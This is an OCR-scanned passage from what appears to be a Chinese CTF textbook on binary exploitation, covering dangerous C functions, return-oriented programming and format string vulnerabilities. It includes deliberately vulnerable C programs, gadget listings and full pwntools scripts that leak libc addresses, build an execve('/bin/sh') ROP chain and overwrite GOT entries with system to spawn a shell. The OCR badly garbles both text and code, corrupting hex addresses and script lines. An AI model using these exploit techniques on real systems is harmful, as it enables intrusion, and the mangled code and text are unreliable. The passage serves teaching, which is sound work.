e exp.py stack stack2 stack.c 


上 述 示例 说明 即使 编译 器 开局 了 保护 功能 ， 在 编写 程序 时 仍然 需要 注意 防止 栈 注 出， 否则 有 可 能 被 攻 
击 者 利用 ， 从 而 产生 严重 后 果 。 


3. 常 发 生 栈 溢出 的 危险 函数 


通过 寻找 危险 函数 ， 我 们 可 以 快速 确定 程序 是 否 可 能 有 栈 溢出 ， 以 及 栈 溢出 的 位 置 。 常 见 的 危险 函数 
如 下 。 


鹤 输入 : gets(0， 直 接 读 取 一 行 ， 到 换行 待 \n 为 止 ， 同 时 \n 被 转换 为 \X00 ; scanf(0)， 格 = 
化 字符 串 中 的 %s 不 会 检查 长 度 ; vscanf0， 同 上 。 


入 输出 : sprintf()， 将 格式 化 后 的 内 容 写 入 缓冲 区 中 ， 但 是 不 检查 绥 冲 区 长 度 。 


4 字符 申 : strcpy0， 遇 到 \x00 停止 ， 不 会 检查 长 度 ， 经 常 容易 出 现 单字 节 写 0 (off by 
Oh 
) 溢出 ; strcat()， 同 上 。 


4. 可 利用 的 村 溢出 覆 兰 位 置 
可 利用 的 村 溢出 覆 兰 位置 通 弟 有 3 种 : 
@ 窗 匠 孙 数 返回 地 址 ， 之 前 的 例子 都 是 通过 和 窗 亲 返回 地 址 控制 程序 。 


@ 覆 盖 栈 上 所 保存 的 BP 寄存 器 的 值 。 溺 数 被 调用 时 会 先 保存 栈 现 场 ， 返 回 时 青 恢复， 具体 操作 如 
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(以 x64 程 序 为 例 ) 。 调 用 时 : 


; 相当 于 mov rsp, rbp 


返回 时 : 如 果 栈 上 的 BP 值 被 覆 六 ， 那 么 消 数 返回 后 ， 主 调 消 数 的 BP 值 会 被 改变 ， 主 调 函 数 返 回 指 行 
re 
时 ，SP 不 会 指向 原来 的 返回 地 址 位 置 ， 而 是 被 修改 后 的 BP 位 置 。 


OS 
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6.4 返回 导 癌 编程 


现代 操作 系统 往往 有 比较 完善 的 MPU 机 制 ， 可 以 按照 内 存 页 的 粒度 设置 进程 的 内 和 存 使 用 权限 。 内 和 存 权 
限 分 别 有 可 读 (R) 、 可 写 (W) 和 可 执行 (X) 。 一 旦 CPU 执 行 了 没有 可 执行 权限 的 内 存 上 的 代码 ， 
操作 系统 会 立即 终止 程序 。 


在 默认 情况 下 ， 基 于 漏洞 组 解 的 规则 ， 程 序 中 不 会 存在 同时 具有 可 写 和 可 执行 权限 的 内 存 ， 所 以 无 ; 

通过 修改 程序 的 代码 段 或 者 数据 段 来 执行 任意 代码 。 针 对 这 种 漏洞 缓解 机 制 ， 有 一 种 通过 返回 到 程序 

中 特定 的 指令 序列 从 而 控制 程序 执行 流程 的 攻击 反 术 ， 被 称 为 返回 导 同 式 编 程 (Return-Oriented 
，ROP) 。 本 节 介 绍 如 何 利用 这 种 技术 来 实现 在 漏洞 程序 中 执行 任意 指令 。 


6.3 节 介绍 了 枝 溢 出 的 原理 和 通过 获 关 返回 地 址 的 方式 来 劫持 程序 的 控制 流 ， 并 通过 ret 旧 令 避 相生 
消 数 来 执行 任意 命令 。 但 是 正常 情况 下 ， 程序 中 不 可 能 存在 这 种 消 数 。 但 是 可 以 利用 以 ret (Oxc3) 
站 令 结尾 的 指令 片段 (gadget) 构建 一 条 ROP 链 ， 来 实现 任意 指令 执行 ， 最 终 实 现任 意 代 码 执行 。 
具体 步骤 为 : 寻找 程序 可 执行 的 内 存 段 中 所 有 的 ret 指 令 ， 然 后 查看 在 ret 前 的 字 节 是 否 包 含有 效 指 
令 ; 如 果 有 ， 则 标记 片段 为 一 个 可 用 的 片段 ， 找 到 一 系列 这 样 的 以 ret 结 来 的 指令 后 ， 则 将 这 些 指令 的 
地 址 按 顺 序 放 在 栈 上 ; 这 样 ， 每 次 在 执行 完 相 应 的 指令 后 ， 其 结尾 的 ret 指 令 会 将 程序 控制 流传 递 给 配 
顶 的 新 的 Gadget 继 续 执 行 。 栈 上 的 这 段 连续 的 Gadget 就 构成 了 一 条 ROP 链 ， 从 而 实现 任意 指令 所 


行 。 
. 寻找 gadget 
(0 : 
信 保 仓 佬 数据 到 寄 仓 器 ， 如 : 


pop rax; ret; 


他 系统 调用 ， 如 : 


和 会 影响 枝 帧 的 Cadget， 如 : 


寻找 Gadget 的 方法 包括 : 寻找 程序 中 的 ret 指 令 ， 查 看 ret 之 前 有 没有 所 需 的 指令 序列 。 也 可 以 使 用 
、Ropper 等 工具 (更 快速 ) 。 


二 一】 一 一 


$ 一 一 一 
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【 例 6-4-1]】 


#include<stdio.h> 


#include<unistd.h> 
int main() { 
char buf[10]; 
puts("hello"); 
gets(buf); 


用 如 下 命令 进行 编译 : 


gcc rop.c -0 rop -no-pie -fno-stack-protector 


与 之 前 栈 溢 出 所 用 的 例子 的 差别 在 于 ， 程 序 中 并 没有 预 置 可 以 用 来 执行 命令 的 函数 。 
先 用 ROPgadget 寻 找 这 个 程序 中 的 Gadget: 


得 到 如 下 Gadget: 


gadgets information 


OQx0000000000d400dae : byte ptr [rax], ah ; jmp rax 

QxQ0000000090400479 : ah, dh ; nop dword ptr [rax + rax] ; ret 

QxQ000000000d40047f : bl, dh ; ret 

OQxQ000000090904005dd : byte [rax], ; add bl, dh ; ret 

Qx00000000904005db : byte [rax], ; add byte ptr [rax], al ; add bl, dh ; ret 
Qx000000000040055d : byte [rax], ; add byte ptr [rax], al ; leave ; ret 
Qx00000000004005dc : byte [rax], ; add byte ptr [rax], al ; ret 
Ox0Q0000000090u0055e : byte [rax], : add cl, cL ; ret 

QxQQ0000000040055f : byte [rax], ; leave ; ret 

Ox00000000004004b6 : byte [rax], ; pop rbp ; ret 

QOx00000000900400d7e : byte [rax], ; ret 

QOxQ0000000004004b5 : byte [rax], r8b ; pop rbp ; ret 

Qx000000009040047d : byte [rax], r8b ; ret 

Qx0000000000400517 : byte ptr [rcx], al ; pop rbp ; ret 

Qx0Q000000000400560 : cL el Tret 

OxQ000000000400518 : dword ptr [rbp - Ox3d], ebx ; nop dword ptr [rax + rax] ; ret 
Ox0Q0000000090400413 : esp, 8 ; ret 

QxQ000000000400412 : rsp: 8 .; ret 

QOxQ000000000400478 : byte ptr [rax], al ; hlt ; nop dword ptr [rax + rax] ; ret 
Qx0Q00000009090400409 : byte ptr [rax], al ; test rax, rax ; je Qx400419 ; caLL rax 


QxQ000000090904005b9 : 


9x900906000904695ba 


OxQ000000000400410 : 
Ox00000000004005bc : 
QOxQ00000000040047a : 


call qword ptr [rl2 + rbx*8] 

: Call qword ptr [rsp + rbx*8] 

call rax 

fmul qword ptr [rax - Ox7d] ; ret 

hlt ; nop dword ptr [rax + rax] ; ret 


QxQ000000000d00d0e : je 9xu466414 ; call rax 

QOxQ000000000d00da9 : je 90x4904c9 ; pop rbp ; mov edi, Ox601038 ; jmp rax 
QxQ0000000900d00deb : je 9x496599 ; pop rbp ; mov edi, QOx601038 ; jmp rax 
QxQ000000000d400db1 : jmp rax 

QOxQQ00000000400561 : Leave ; ret 

Qx00000000900400512 : byte ptr [rip + Ox200b1lf], 1 ; pop rbp ; ret 
OQxOQ000000000d0055c : eax, 0 ; leave ; ret 

QxQ000000000400dac : edi, QOx601038 ; jmp rax 


QOxQ0000000004005b7 : mov edi, ebp ; call qword ptr [rl2 + rbx*8] 
QOxQ0000000004005b6 : mov edi, rl3d ; call qword ptr [rl2 + rbx*8] 
OxQ000000000400db3 : nop dword ptr [rax + rax] ; pop rbp ; ret 
QOxQ00000000040047b : nop dword ptr [rax + rax] ; ret 

OxQO0000000004004f5 : nop dword ptr [rax] ; pop rbp ; ret 
Ox0Q000000000400515 : or esp, dword ptr [rax] ; add byte ptr [rcx], al ; pop rbp ; ret 
OxQ0000000004005b8 : out dx, ; caLL qword ptr [rl2 + rbx*8] 
OxQ000000000d4005cc : pop Frl2 ; rl3 ; pop Frl4 ; pop Frl15 ; ret 
OxQQ00000000d005ce : pop rl3 ， rly ; pop rl5 ; ret 

OxQ0000000004005d0 : pop rld ; - 

OxQ0000000004005d2 : pop Frl5 ; 

OxQ000000090d400dab : pop rbp ; edi, OQx601038 ; jmp rax 
OQxQ000000000d005cb : pop rbp ; rl2 ; pop rl3 ; pop rly ; pop rl5 ; ret 
OxQ0000000004005cf : pop rbp ; rly ; pop Fr15 ; ret 

OxQQ000000000d400db8 : pop rbp ; 

OQx0QQ0000000004005d3 : pop rdi ; 

OxQ00000009004005d1 : pop rsi ; riS » ret 

OxQQ00000000d005cd : pop rsp ; pop rl3 ; pop Frl4 ; pop rl5 ; ret 
OxQO00000000400416 : ret 

QxQ00000000640040d : sal byte ptr [rdx + rax - 1], Oxd0 ; add rsp, 8 ; ret 
9x900000000640095e5 : sub esp, 8 ; add rsp, 8 ; ret 

OxQQ00000000d4005ed : sub rsp, 8 ; add rsp, 8 ; ret 

9x9009909600994695da : test byte ptr [rax], al ; add byte ptr [rax], al ; add byte ptr [rax], al ; 
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ret 
OxQ00000000040040c : test eax, eax ; je QxHQ0416 ; call rax 
OxQO00000000d400d0b : test rax, rax ; je 0xu600417 ; call rax 


Unique gadgets found: 58 


这 个 程序 很 小 ， 可 供 使 用 的 Gadget 非 常 有 限 ， 其 中 没有 syscall 这 类 可 以 用 来 执行 系统 调用 的 _ 

adgqe 
， 所 以 很 难 实现 任意 代码 执行 。 但 是 可 以 想 办 法 先 获 取 一 些 动态 链接 库 (如 libc) 的 加 载 地 址 ， 骨 使 
用 libc 中 的 Gadget 构 造 可 以 实现 任意 代码 执行 的 ROP。 


程序 中 弟弟 有 像 puts、gets 等 libc 提 供 的 库 函 数 ， 这 些 函 数 在 内 人 存 中 的 地 址 会 写 在 程序 的 COT 表 中 ， 

当 程 序 调用 库 函 数 时 ， 会 在 GOT 表 中 读 出 对 应 函数 企 内 存 中 的 地 址 ， 然 后 跳 转 到 该 地 址 执行 〈( 见 图 6 
4-1) ， 所 以 先 利用 puts 函 数 打印 库 函 数 的 地 址 ， 减 掉 该 库 函 数 与 libc 加 载 基 地 址 的 含 移 ， 融 可 以 计算 
出 libc 的 基地 址 。 


.plt:0000000000400430 

.plt:06000000000400430 ; Attributes: thunk 
.plt:000060600606064606430 

.plt:00000000606046060439 ; int puts(const char *s) 
.Plt:60000000000400430 _puts proc near 
.plt:00000060006400430 jmp cs:off 601018 
.Plt:00000000004004309 _puts 

.plt:68000000000400430 

.Plt:0000000000400436 ， 


图 6-4-1 
程序 中 的 GOT 表 见 图 6-4-2。 puts 函 数 的 地 址 被 保存 在 0x601018 位 置 ， 只 要 调用 puts SS 
) ， 就 会 打印 puts 函 数 在 libc 中 的 地 址 。 


>>> from pwn import * 
>>> p=process('./rop') 


[x] Starting local process './rop' 

[+] Starting local process './rop': pid W685 
>>>pop_rdi = 0x4005d3 

>>>puts_got = 9x601018 

>>>puts = Ox400430 

>>> p.sendline('a'*18+p64(pop_rdi)+p6d4(puts_got)+p6d(puts)) 
>>> p.recvuntil('\n') 

'hello\n' 

>>> addr = u6y(p.recv(6).ljust(8,'\x00')) 
>>> hex(addr) 

'Qx7Tfcd606e19c0' 


根据 puts 函 数 在 libc 库 中 的 偏 移 地 址 ， 融 可 以 计算 出 libc 的 基地 址 ， 然 后 可 以 利用 libc 中 的 Gadget 构 
造 可 以 执行 /bimn/sh” 的 ROP， 从 而 获得 shell。 可 以 直接 调用 libc 中 的 system 函 数 ， 也 可 以 使 用 

SYS 

系统 调用 来 完成 。 调 用 system 消 数 的 方法 与 之 前 的 类 似 ， 所 以 这 里 改 为 用 系统 调用 来 进行 演示 


.got.plt:00000000006010860 ; Segment permissions: Read/Write 

t.plt:0000000000601000 _got plt segment qword public “DATA”use64 
.got.plt:0000000000601000 assume cs: got plt 
.got.plt:0000000000601000 ;org 601066h 
.got.plt:00000000006601066 _GLOBAL_OFFSET_TABLE_ dq offset _DYNAMIC 
.Eot.plt:08000000000601008 qword_601668 0 ; DATA XREF: sub_ 4684 
.got.plt:0000000000601010 qword_601010 ; DATA XREF: sub 4064 
.got.plt:0000000000601018 off_661618 dq offset puts ; DATA XREF: putsitr 
.got.plt:0000000000601020 off_601020 dq offset gets ; DATA XREF: getsitr 
.got.plt:0000000000601020 _got_plt ends 
.got.plt:08000000000601020 


通过 查询 系统 调用 表 ， 可 以 知道 execve 的 系统 调用 号 为 59， 想 要 实现 任意 命令 执行 ， 需 要 把 参数 设置 
为 : 


execve("/bin/sh", 0, 0) 
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在 Xx64 位 操作 系统 上 ， 设 置 方式 为 在 执行 syscall 前 将 rax 设 为 ?99，rdi 设 为 字符 串 "/bin/ysh "的 地 址 ， 
和 rdx 设 为 0。 字 符 串 "/bin/sh "可 以 在 libc 中 找到 ， 不 需 另外 构造 


「9| 


虽然 不 能 直接 改写 寄存 器 中 的 数据 ， 但 是 可 以 将 要 写 入 宵 存 器 的 数据 和 Gadget 一 起 入 栈 ， 然 后 通 
出 栈 指令 的 Gadget， 将 这 些 数 据 写 入 寄存 器 。 本 例 需 要 用 到 的 寄存 器 有 RAX、RDI、RSI、RDX, 5 
以 从 libc 中 找到 需要 的 Gadget: 


Qx000000000086439c8 : pop rax ; 
OQxQ00000000002155f : pop rdi ; 
Qx00000000909023e6a : pop rsi ; 
9x09009000090601b96 : pop rdx ; 
9x6900906660066d2975 : syscall ; 


泄露 库 消 数 地 址 后 ， 接 下 来 要 做 的 束 是 控制 程序 重新 执行 main 消 数 ， 这 样 可 以 让 程序 重新 执行 ， 从 而 
可 以 读 入 并 执行 新 的 ROP 链 来 实现 任意 代码 执行 。 


完整 利用 脚本 如 下 : 


from pwn import * 
p=process('./rop') 
elf=ELF('./rop') 


Libc = elf.libc 

pop_rdi = 9x4005d3 

puts_got = Ox601018 

puts = Ox400430 

main = Qx400537 

ropl = "a"*]18 

ropl += p64(pop_rdi) 

ropl += p64(puts_got) 

ropl += p64(puts) 

ropl += p64(main) 

p.sendLine(rop1) 

p.recvuntil('\n') 

addr = u6y(p.recv(6).ljust(8, '\x09')) 
Libc_base = addr - libc.symbols['puts'] 
info("libc:Qx%x", libc_base) 

pop_rax = QxQ0000000000439c8 + Libc_base 
pop_rdi = 9x9000600660602155f + Libc_base 
pop_rsi = 90x900060060606023e6a + Libc_base 
pop_rdx = 90x90000060606001b96 + Libc_base 
syscall = 90x9000060606006d2975 + Libc_base 
binsh = next(libc.search("/bin/sh"),) + Libc_base 
# 搜索 Libc 中 /bin/sh”" 字 符 串 的 地 址 

rop2 = "a"*]18 

rop2 += p6y(pop_rax) 

rop2 += p64(59) 

rop2 += p64(pop_rdi) 

rop2 += p64(binsh) 

rop2 += p64(pop_rsi) 

rop2 += p64(0) 

rop2 += p64(pop_rdx) 

rop2 += p64(0) 

rop2 += p6d(syscall) 


p.recvuntil("hello\n") 
p.sendline(rop2) 
p.interactive() 


ROP 的 基本 介绍 如 上 ， 读 者 可 以 按照 上 面 的 例子 ， 在 调试 器 中 单 步 跟踪 ROP 的 执行 过 程 。 这 样 可 以 深 
刻 理解 ROP 执 行 的 原理 和 过 程 。ROP 更 加 高 级 的 用 法 ， 如 循环 选择 等 ， 需 要 根据 一 定 条 件 修改 RSP 的 
[EBS VT 
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6.5 格式 化 字符 串 漏 洞 


6.5.1 格式 化 字符 串 漏洞 基本 原理 
C 语 言 中 常用 的 格式 化 输出 函数 如 下 : 


int printf(const char *format, ...); 
int fprintf(FILE xstream, const char *format, ...); 
int sprintf(char xstr, const char x*format, ...); 


它们 的 用 法 类 似 ， 本 节 以 printf 为 例 。 在 C 语 言 中 ，printf 的 常规 用 法 为 : 


printf("%s\n", "hello world! "); 
printf("number:%d\n", 1); 


其 中 ， 函 数 第 一 个 参数 囊 有 %d、%s 等 占 位 符 的 字符 串 被 称 为 格式 化 字符 串 ， 占 位 符 用 于 指明 输出 的 
参数 值 如 何 格式 化 。 


占 位 符 的 语法 为 : 


%[parameter][flags][field width][.precision][Length]jtype 


parameter 可 以 忽略 或 者 为 n$，n 表 示 此 占 位 符 是 传 入 的 第 几 个 参数 。 

flags 可 为 0 个 或 多 个 ， 主 要 包括 : 
多 + 一 总 是 表示 有 符号 数值 的 '+ ' 或 - ， 黑 认 忽 略 正 数 的 符号 ， 仅 适用 于 数值 类 型 。 
4 空格 有 符号 数 的 输出 如 果 没有 正 负 号 或 者 输出 0 个 字符 ， 则 以 1 个 空格 作为 前 缀 。 
多 -一 左 对 齐 ， 默 认 是 右 对 齐 。 


多 # 一 对 于 'g 与 'G ， 不 删除 尾部 0 以 表示 精度 ; 对 于 ff、'F'、'e'、'E'、'g'、'G'， 忆 是 输出 小 
数 点 ; 对 于 'o 、X'、'X ， 在 非 0 数值 前 分 别 输出 前 缀 0、0x 和 0X， 表 示 数 制 。 


4 0 一 在 宽度 选项 前 ， 表 示 用 0 填充 . 


field width 给 出 显示 数值 的 最 小 宽度 ， 用 于 输出 时 填充 固定 宽度 。 实 际 输出 字符 的 个 数 不 足 域 宽 时 ， 
根据 左 对 齐 或 右 对 齐 进 行 填充 ， 负 号 解释 为 左 对 齐 标志 。 如 果 域 宽 设 置 为 “”， 则 由 对 应 的 函数 参 
数 的 值 为 当前 域 宽 。 


precision 通 单 指明 输出 的 最 大 长 度 ， 依 赖 于 特定 的 格式 化 类 型 : 
i、U、Xx、o0 的 整 型 数值 ， 指 最 小 数字 位 数 ， 不 足 的 在 左 侧 补 0。 
对 于 a、A、e、E、f、F 的 浮 点 数值 ， 指 小 数 点 右边 显示 的 位 数 。 
多 对 于 g、G 的 浮 点 数值 ， 指 有 效 数 字 的 最 大 位 数 。 
多 对 于 s 的 字符 串 类 型 ， 指 输出 的 字 节 的 上 限 。 
如 果 域 宽 设 置 为 “”， 则 对 应 的 函数 参数 的 值 为 precision 当 前 域 宽 。 
length 指 出 浮 点 型 参数 或 整 型 参数 的 长 度 : 


令 hh 一 匹配 int8 大 小 (1 字 节 ) 的 整 型 参数 。 
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好 站 -一 此 Int1 和 大 小 | 


多 | 一 对 于 整数 类 型 ， 匹 配 long 大 小 的 整 型 参数 ; 对 于 浮 点 类 型 ， 匹 配 double 大 小 的 参数 ; 
对 于 字符 串 s 类 型 ， 匹 配 wchar _t 旧 针 参 数 ; 对 于 字符 < 类型， 匹配 wint t 型 的 参数 。 


他 | 一 匹配 long long 大 小 的 整 型 参数 。 
他 [一 匹配 long double 大 小 的 整 型 参数 。 
他 Z 一 匹配 size_t 大 小 的 整 型 参数 。 
和 一 匹配 intmax_t 大 小 的 整 型 参数 。 
人 t 一 匹配 ptrdiff t 大 小 的 整 型 参数 。 
type 表 示 如 下 : 
冬 d、i 一 有 符号 十 进 制 int 值 。 
他 U 一 十 进 制 unsigned int 值 。 
叙 f、F 一 十 进 制 double 值 。 
仿 e、E 一 double 值 ， 输 出 形式 为 十 进 制 的 “[-]d.ddd e[+/-]ddd” 。 
和 g9、G 一 double 型 数值 ， 根 据 数值 的 大 小 ， 目 动 选 f 或 e 格 式 。 
他 X、X 一 十 六 进 制 unsigned int 值 。 
及 0 一 八进制 unsigned int 值 。 
邓 5 一 字符 串 ， 以 \X00 结 尾 。 
他 < 一 一 个 char 类 型 字符 。 
a p 一 void* 指 针 型 值 。 


他 a、A 一 double 型 十 六 进 制 表示 ， 即 "[-]0xh.hhhh p+d"， 指 数 部 分 为 十 进 制 表 示 的 形 


允 n 一 把 已 经 成 功 输出 的 字符 个 数 写 入 对 应 的 整 型 指针 参数 所 指 的 变量 。 
他 % 一 '% 字 面值 ， 不 接受 任何 flags、width、precision 或 length。 


如 果 程 序 中 printf 的 格式 化 字符 串 是 可 控 的 ， 即 使 在 调用 时 没有 填 入 对 应 的 参数 ，print 僧 | 数 也 会 从 该 
参数 位 置 所 对 应 的 寄存 器 或 栈 中 取出 数据 作为 参数 进行 读 写 ， 容 易 造 成 任意 地 址 读 写 。 


6.5.2 格式 化 字符 串 漏 洞 基本 利用 方式 

通过 格式 化 字符 串 漏洞 可 以 进行 任意 内 存 的 读 写 。 由 于 函数 参数 通过 栈 进 行 传递 ， 因 此 使 用 “%X 
$p” (为 任意 正 整数 ) 可 以 泄露 栈 上 的 数据 。 并 且 ， 在 能 对 栈 上 数据 进行 控制 的 情况 下 ， 可 以 事先 
将 想 泄露 的 地 址 写 在 栈 上 ， 再 使 用 “%X$p” ， 就 可 以 以 字符 串 格式 输出 想 泄露 的 地 址 。 


除 此 之 外 ， 由 于 “%n” 可 以 将 已 经 成 功 输出 的 字符 的 个 数 写 入 对 应 的 整 型 指针 参数 所 指 的 变量 ， 
此 可 以 事先 在 栈 上 布置 想 要 写 入 的 内 人 存 的 地 址 。 再 通过 “%Yc%X$n” (Y 为 想 要 写 入 的 数据 ) 就 可 


\ = 一 Er J = 
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【 例 6-5-1】 


#include<stdio.h> 
#include<unistd.h> 
int main() { 
setbuf(stdin, 0); 
setbuf(stdout, 0); 
setbuf(stderr, 0); 
while(1) { 
char format[100]; 
puts("input your name:"); 
read(0, format,100); 
printf("hello "); 
printf(format); 
} 
return 0; 


. 


用 如 下 命令 编译 例 6-5-1 的 程序 : 


gcc fsb.c -o fsb -fstack-protector-all -pie -fPIE -~z lazy 


在 printf 处 设置 断 点 ， 此 时 RSP 正 好 在 我 们 输入 字符 串 的 位 置 ， 即 第 6 个 参数 的 位 置 (64 位 Linux 前 5 个 
参数 和 格式 化 字符 串 由 寄存 器 传递 ) ， 我 们 输入 “AAAAAAAA%6$p”: 


$ ./fsb 

input your name: 

AAAAAAAA%6$p 

heLLo AAAAAAAAGx41U414141414143141 


程序 确实 把 输入 的 8 个 A 当 作 指 针 型 变量 输出 了 ， 我 们 可 以 先 利用 这 个 进行 信息 泄露 。 


栈 中 有 _ libc_ start main 调用 _libc_csu_init 前 压 入 的 返回 地 址 ( 见 图 6-5-1) ， 根 据 这 个 地 址 ， 就 可 
以 计算 libc 的 基地 址 ， 可 以 计算 出 该 地 址 在 第 21 个 参数 的 位 置 ; 同 理 ，_start 在 第 17 个 参数 的 位 置 ， 
通过 它 可 以 计算 出 fsb 程 序 的 基地 址 。 


$ ./fsb 

input your name: 

%17$p%21$p 

hello 9x559ac59416d00x7f1b57374b97 








图 6-5-1 


有 了 libc 基 地 址 后 ， 就 可 以 计算 system 函 数 的 地 址 ， 然 后 将 GOT 表 中 printf 函 数 的 地 址 修改 为 system 
国 数 的 地 址 。 下 一 次 执行 printf (format) 时 ， 实 际会 执行 system (format) ， 输 入 format 为 人 

l 
/sh” 即 可 获得 shell。 利 用 脚本 如 下 : 


from pwn import * 

elf = ELF('./fsb') 

Libc = ELF('./Libc-2.27.so0') 

p= process('./fsb') 
p.recvuntiLC'name:') 
p.sendline("%17$p%21$p") 
p.recvuntil("Qx") 

addr = int(p.recvuntil('Qx')[:-2],16) 
base = addr - elf.symbols['_start'] 
info("base:Ox%x", base) 

addr = int(p.recvuntil('\n')[:-1],16) 


libc_base = addr - Libc.symbots['__Libc_start_main']-9xe7 
info("libc:Qx%x", libc_base) 


system = libc_base + libc.symbols['system'] 
info("system:Qx%x", system) 

ch6 = System&Oxffff 

chl = (((system>>16)&9xffff])-ch9)&9xfff 和 

ch2 = (((system>>32)&0xffff)-(chO+ch1))SOxffff 


payLoad = "%"+str(ch@)+"c%12$hn" 
payload += "%"+str(ch1)+"c%13$hn" 
payload += "%"+str(ch2)+"c%1d$hn" 
payload = payload.ljust(48, 'a') 
payload +=p6d4(base+Qx201028) 

# printf 在 GOT 表 中 的 地 址 

payLoad +=p64(base+Qx201028+2) 
payload +=p64(base+0x2016028+4) 
p.sendline(payload) 
p.sendline("/bin/sh\x00") 
p.interactive() 


脚本 中 将 system 的 地 址 (6 字 节 ) 拆 分 为 3 个 word (2 字 节 ) ， 是 因为 如 果 一 次 性 输出 一 个 int 型 以 上 
的 字 节 ，printf 会 输出 几 GB 的 数据 ， 在 攻击 远程 服务 器 时 可 能 非常 慢 ， 或 者 导致 管道 中 断 (broken 
) 。 注 意 ，64 位 的 程序 中 ， 地 址 往往 只 占 6 字 节 ， 也 就 是 高 位 的 2? 字 节 必然 是 “\X00”， 所 以 3 不 
地 址 一 定 要 放 在 payload 最 后 ， 而 不 能 放 在 最 前 面 。 虽 然 放 在 最 前 面 ， 偏 移 量 更 好 计算 ， 但 是 printf 答 
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出 字符 串 时 是 到 “\x00” 为 止 ， 地 址 中 的 “\x00” 会 截断 字符 串 ， 之 后 用 于 写 入 地 址 的 占 位 符 并 不 会 
7 


6.5.3 格式 化 字符 串 不 企 栈 上 的 利用 方式 


有 时 输入 的 字符 串 并 不 是 保存 在 栈 上 的 ， 这 样 没 法 直接 在 栈 上 布置 地 址 去 控制 printf 的 参数 ， 这 种 情 
况 下 的 利用 相对 比较 复杂 。 


因为 程序 有 在 调用 函数 时 将 rbp 压 入 栈 中 或 者 将 一 些 指针 变量 存在 栈 中 等 操作 ， 所 以 栈 上 会 有 很 多 保 
仔 着 栈 上 地 址 的 指针 ， 而 且 容 易 找 到 三 个 指针 p1、p2、p3， 形 成 p1 指 向 p2、p2 指 向 p3 的 情况 ， 这 
DE [9 
可 以 逐 字 节 地 修改 p3 成 为 任意 值 ， 间 接地 控制 了 栈 上 的 数据 。 


【 例 6-5-2】 


#include<stdio.h> 

#include<unistd.h> 

void init() { 
setbuf(stdin, 0); 
setbuf(stdout, 0); 
setbuf(stderr, 0); 
return; 


} 

void fsb(char* format,int n) { 
puts("please input your name:"); 
read(Q0, format, n); 
printf("hello"); 


printf(format); 
return; 
1 
void vuln() { 
char * format = malloc(200); 
for(int i=0; i<30; i++) { 
fsb(format, 200); 


free(format); 
return; 


} 

int main() { 
init(); 
vuln(); 
return; 


} 


用 如 下 命令 编译 例 6-5-2 的 程序 : 


gcc fsb.c -o fsb -fstack-protector-all -pie -fPIE -z lazy 


在 printf 处 设置 断 点 ， 此 时 栈 分 布 情况 见 图 6-5-2。 0x7ffffffee030 处 保存 的 指针 指向 Ox7ffffffee 
， 而 Ox7ffffffee060 处 保存 的 指针 又 指向 了 0x7ffffffee080， 满 足 了 上 面 的 要 求 ， 这 3 个 指针 分 别 在 ” 
第 10、16、20 个 参数 的 位 置 ， 该 程序 在 循环 执行 30 次 输入 、 输 出 前 申请 了 一 个 内 存 块 ， 用 于 很 
放 输入 的 字符 串 ， 循 环 结束 后 会 释放 掉 这 个 内 存 块 然后 退出 程序 。 我 们 可 以 将 0x7ffffffee080 处 的 值 
改 为 GOT 表 中 free 函 数 顺 的 地 址 ， 再 将 其 中 的 函数 指针 改 为 system 卫 数 的 地 址 。 这 样 在 执行 free (， 
) 时 ， 实 际 执行 的 殊 是 system (format) 了 ， 只 要 输入 "/bin/sh" 即 可 拿 到 shell。 


rmat 





图 6-5-2 
完整 脚本 如 下 : 


from pwn import * 
p=process('./fsb2') 

Libc = ELF('./Libc-2.27.s0') 
elf = ELF('./fsb2') 


a ] 
p.sendline('%10$p%11$p%21$p') 
茵 第 一 步 仍 然 是 港 害 需要 用 到 的 地 址 
p.recvuntil('ex') 
Stack_addr = int(p.recvuntil('ex')[:-2], 16) 
addrl = int(p.recvuntil('ex")[:-2], 16) 
1 - elf,synbols['vuln']-0x3f 
= int(p.recvuntil("\n’)[:-1], 16) 
se = addr2 - Libc.syaboLs['__Uibc_start_main']-9xe7 


info("stack:9xSx"，stack_addr) 
e. 
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人 elf.got['free'] 
system = libc_base + libc.symbols['systen']) 
info("systen:Ox%x", system 
re 


off = (p3+x)S0xff 
p.recvuntil('nane') 
p.sendline("%"+str(off)+"c%10$hhn"+"\x00'*50. 
瘟 每 次 修改 p2 柱 针 的 低 字 季 使 其 相向 p3 福 针 各 字 芝 的 地 址 
ch = (free_got>>(x*8))580xff 
p.recvuntil('name') 
p.sendline("%"+str(ch)+"c%16$hhn"+"'\x00'*50) 
状 修改 p3 福 针 所 指向 的 地 址 为 free_got 地 址 对 应 字 节 的 值 
关 身 环 结 来 后 ，p3 指针 所 指向 的 变量 被 修改 为 GOT 表 中 free 济 数 项 的 地 址 (以 下 未 读 变 芋 为 free_got_ptr 松针 ) 
# overwrite free_got to system 
for i in range(9,6): 
off = (free_got+i)S0xff 
p.recvuntil('nane') 
p.sendline("%"+str(off)+"c%16$hhn"+'\x80'*50) 
问 每 次 侵 改 free_got_ptr 镍 针 的 狼 字 节 使 其 指向 GOT 表 中 free 函 教 项 指针 的 各 字 节 的 地 址 
ch = (system>>(1*8))S0xff 
p.recvuntil('nanme') 
p.sendline("%"+str(ch)+"c%20$hhn"+"\x80'*50) 
关 颂 改 free_got_ptr 所 指向 地 址 为 system 地 址 对 应 字 节 的 值 
关 稍 环 结 来 后 ，GOT 表 中 free 酚 教 项 指针 指向 5ystem 面 数 地 址 
for i in range(30-25); 
p.recvuntil('nane'’) 
p.sendline('/bin/sh'+"\x80'»*100) 
间 修改 format 为 "/bin/sh"， 袜 环 米 来 稀 族 format 时 抉 行 System("/bin/sh") 


p.interactive() 


6.5.4 格式 化 字符 串 的 一 些 特 殊 用 法 


格式 化 字符 串 有 时 会 遇 到 一 些 比 较 少 见 的 所 位 符 ， 如 "表示 取 对 应 函数 参数 的 值 来 作为 宽大 ，printf 
全 人 qd 


【 例 6-5-3]】 


#include<stdio.h> 
#include<unistd.h> 
#incLude<fcntL.h> 
int main() { 
char buf[100]; 
long long a=g; 
long long b=0; 
int fp = open("/dev/urandom" ,0_RDONLY) ; 
read(fp, &a, 2); 
read(fp, &b, 2); 
close(fp); 
long long num; 
puts("your name:"); 
read(0, buf, 100); 
puts("you can guess a number,if you are lucky I will give you a gift:"),; 


long Long *num_ptr = &num; 

scanf("%lld", num_ptr); 

printf("hello "); 

printf(buf); 

printf("let me see ..."); 

if(at+b == num) { 
puts("you win, I will give you a shell!"); 
system("/bin/sh"); 

} 

else { 
puts("you are not lucky enough"); 
exit(0); 

} 

j 


